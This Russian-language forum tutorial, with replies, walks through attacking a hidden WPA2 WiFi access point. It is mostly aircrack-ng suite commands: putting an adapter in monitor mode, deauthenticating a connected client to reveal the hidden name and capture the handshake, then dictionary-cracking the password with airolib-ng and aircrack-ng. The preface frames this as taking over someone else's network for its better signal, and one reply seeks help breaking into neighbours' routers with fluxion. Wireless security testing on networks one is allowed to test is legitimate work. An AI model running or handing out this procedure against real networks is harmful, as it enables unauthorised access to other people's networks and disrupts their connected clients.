Статья Раскрытие имени, получение handshake и подбор пароля скрытой точки доступа.

Приветствие

Приветствую всех читателей codeby!

Как и обещал напишу ещё пару статеек\инструкций на тему WiFi пока есть не много свободного времени, Китайский новый год всё таки!

Пробежался беглым взглядом по форуму, не много почитал о некоторых нововведениях на форуме, огорчило что забросили CodebyOS, надеялся испытать её в действие, но видать пока что не судьба...

За то порадовали некоторые плюшки которые пообещала администрация codeby, так же порадовали конкурсы и общее развитие ресурса!

Приятная подача материала, приятное общение и т.п. (в хорошем смысле этого словосочетания) осталось неизменно, это очень радует и хочется что бы так было всегда!

Ооо, чуть не забыл... Очень приятно порадовало развитие магазина Codeby, есть вещи очень даже полезные, но думаю ассортимент все равно увеличится и полезных вещей станет ещё больше, если появятся "глушилки" диктафонов(в том числе и цифровых) и им подобных прослушивающих устройств, думаю от клиентов не будет отбоя.

Предисловие

Как можно понять из названия темы, речь пойдёт о скрытой точки доступа WiFi.Поговорим и рассмотрим на примере как можно такую точку индетефицировать, как перехватить handshake и как его дальше обработать.Большинство из тех кто сталкивается со скрытыми точками доступа обходят их стороной, по просту потому что не знают как с ними работать, как узнать название этой точки и как дальше с ней быть.Но случай разный, бывает и так что наилучший сигнал как раз у этой скрытой точки, зачем использовать то что хуже, когда можно и нужно взять лучшее.

Пробежался поиском по форуму, вроде таких тем не обнаружил, если это так, значить этот топик своего рода эксклюзив!

Введение

Практически как и в других случаях работы с WiFi всё довольно просто, необходим как и в других случаях перехвата handshake подключенный к этой точке клиент, это наверное основное требование в этом случае.

Суть в том что бы заставить подключенного клиента прокричать скрытое имя точки, для этого необходимо деавторизировать этого клиента и повторном подключение этот клиент произнесёт заветные слова, в этот же момент и будет перехвачен handshake, ну а дальше дело техники.

Для всех действий нам потребуется только один инструмент, точнее набор инструментов AirCrack и наличие словаря для подбора пароля.

Подготовка

На борту Kali linux уже установлено всё необходимое, думаю вообще сложностей с установкой AirCrack возникнуть не должно.
Переводим наш адаптер в режим монитора, а для того что бы в процессе всех действий нам ни чего не мешало необходимо убить все процессы работающие с сетью, для этого в консоле набираем:
Код:
airmon-ng check kill
img1.png


Узнаём имя нашего адаптера:
Код:
iwconfig
img2.png


Переводим его в режим монитора:
Код:
airmon-ng start wlan0
img3.png


Действие

И начинаем дампить происходящие в эфире:
Код:
airodump-ng wlan0mon
img4.png

Код:
10:10:10:10:38:8D  -59        4        2    0  11   65  WPA2 CCMP   PSK  <length:  6>
В этой строке видим скрытую точку, "<length: 6>" говорит нам что в скрытом название хранится 6 символов, "10:10:10:10:38:8D" это MAC адрес нашей точки, в колонке ниже видим подключившегося к этой точке клиента:
Код:
10:10:10:10:38:8D  10:10:10:10:D8:69  -23    0 - 0e     0        1
"10:10:10:10:D8:69" MAC адрес подключившегося клиента, в принципе это всё что нам нужно для дальнейших действий.

Далее запускаем airodump с фильтром MAC адреса ("10:10:10:10:38:8D") скрытой точки, на 11 канале и префиксом файла дампа
Код:
airodump-ng --bssid 10:10:10:10:38:8D -c 11 -w output wlan0mon
img5.png


В новом окне параллельно запускаем Aireplay для деаутентификации клиента:
Код:
aireplay-ng --deauth 10 -a 10:10:10:10:38:8D -c 10:10:10:10:D8:69 wlan0mon
img7.png


-a Устанавливаем MAC адрес с целью обмануть клиента и представится точкой доступа к которой подключен, с этим адресом ему будет приходить пакет деаунтефикации, -с MAC адрес клиента на который будут идти пакеты деаунтефикации.

После того как aireplay отработал, в окне с запущенным airodump в поле "Probe" отобразится название скрытой точки, в верхнем правом углу увидим надпись "WPA handshake: 10:10:10:10:38:8D", которая расскажет нам об удачном захвате handshake.

img8.png


Название точки получено, handshake захвачен, пришло время воспользоваться airolib.
Airolib необходима для создания своеобразной базы данных, в которой будут находится названия точек и пароли, после создание базы используя aicrack пробрутим захваченный handshake.

Создаём базу данных "crackhandshake" и импортируем в неё список паролей.
Код:
airolib-ng crackhandshake --import passwd /root/wifi/codebynet.lst
img9.png


Создаём текстовый файл с именем "essid" в который вписываем название точки которое мы уже получили в поле "probe" и сохраняем его в корне.
Код:
leafpad essid
Откроется текстовый редактор, впишете в него полученное имя, в моём случае это "codeby" и сохраните.
Далее импортируем его в уже созданную базу "crackhandshake" с помощью airolib:
Код:
airolib-ng crackhandshake --import essid ./essid
img10.png


Далее проверяем статус созданной базы:
Код:
airolib-ng crackhandshake --stats
img11.png


Выполняем очистку от старого мусора, также это сократит размер базы и запустит проверку целостности нашей базы:
Код:
airolib-ng crackhandshake --clean all
img12.png


Производим пакетную обработку:
Код:
airolib-ng crackhandshake --batch
img13.png


Запускаем проверку нашей базы, с ключом "all" некорректные будут удалены:
Код:
airolib-ng crackhandshake --verify all
img14.png


База создана и проверена, остаётся только запустить перебор полученных вариаций, для этого будем использовать aircrack:
Код:
aircrack-ng -r crackhandshake output-01.cap
img15.png


Разумеется в этом случае всё зависит от вашего словаря, если в нём есть подходящий пароль, то успех гарантирован!

Заключение

Весь ход действий расписан и практически к каждому шагу сделан соответствующий скрин(здесь наверное не много переборщил), разумеется такая подача материала расчитана прежде всего на новичков в этом направление.
 
Последнее редактирование:
Уважаемые форумчане скажите какую из направленных антенн посоветуйте и на какой адаптер лучше всего приобрести?
1.
2.
3.
 
У тебя и без этих антенн неплохо всё выглядит ))
Уважаемые форумчане скажите какую из направленных антенн посоветуйте и на какой адаптер лучше всего приобрести?
1.
2.
3.
Если тебе нужно организовать соединение двух Wi-Fi точек на большом расстоянии, (НЕ ВАРДРАЙВИНГ) , то обрати внимание на изделие.
Если Wi-Fi антеннами ты интересуешься только с целью аудита сетей, то бери ту, что подешевле. Зачем деньги на ветер кидать ?
Думаю, что на практическое применение антенн будет примерно одинаковым.
 
  • Нравится
Реакции: Shadow User и Lenar
бюджетные магистральные линки протяжённостью до 50 км.
Если только в степи или пустыне.
Вот сколько раз слышал про ФА 20, но что то всё ни как мог выбрать время чтобы собрать и затестить.

Может кто пробовал?
 
Есть альтернатива Airolib, пошустрей? Со словарем 40 мб так и не дождался пока создаст свой.
 
Можно создать таблицу с помощью cowpatty, а после уже импортировать в airolib.
 
  • Нравится
Реакции: Tihon49
Не палите bssid' ы в видосах про аудит беспроводных сетей. Это считается плохим тоном. Да и координаты своего аудита раскрываете.
 
Последнее редактирование:
  • Нравится
Реакции: centr
а не проще все это самое сделать через WIFITE, наиболее простой интерфейс и минимальный набор команд, а функционал тот же
 
Это считается плохим тоном. Да и координаты своего аудита раскрываете.
Ни в коем случае не хочу бросить тень сомнения на эту фразу.
Но координаты аудита, раскрываемые здесь , в темах и постах на форуме - это меньше, чем капля в море.
Я иногда балуюсь подбором пин-кодов к ТД со своего планшета.
Так некоторые программы для аудита Wi-Fi на Андроид даже не желают запускаться, если на планшете отключена функция GPS.
Никто не знает ответ на вопрос:
- какую роль при атаке на WPS играют спутники навигации ?
 
  • Нравится
Реакции: Shadow User
Всех приветствую. Немого никак побороть тему взлома WiFi. Просто брутить пароль не вижу смысла. Дело гиблое. У меня знаю 10 цифр. У соседей думаю такие же. То что провайдера всего два и сеть не так уж давно провели. Значит и роутеры примерно одинаковые и пароли то же ... как итог пришёл к fluxion... но он плохо глушит сигнал ... приём показывает от 79-85... мониторю с телефона работу fluxion. Не всегда но вижу как появляется сканируемая сеть и моя ложная... подскажите какие ещё способы) только не с брутом)
 
Всем привет. Подскажите пожалуйста, скрытая сеть имеет такие атрибуты PSK <length: 0> Это говорит, что логина вообще нет? Деанимизировать не получается. С чем это может быть связано? Буду признательна за помощь
 
Всем привет. Подскажите пожалуйста, скрытая сеть имеет такие атрибуты PSK <length: 0> Это говорит, что логина вообще нет? Деанимизировать не получается. С чем это может быть связано? Буду признательна за помощь
Если без пароля, то была б Open. Скорее дело в отсутствии клиентов.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!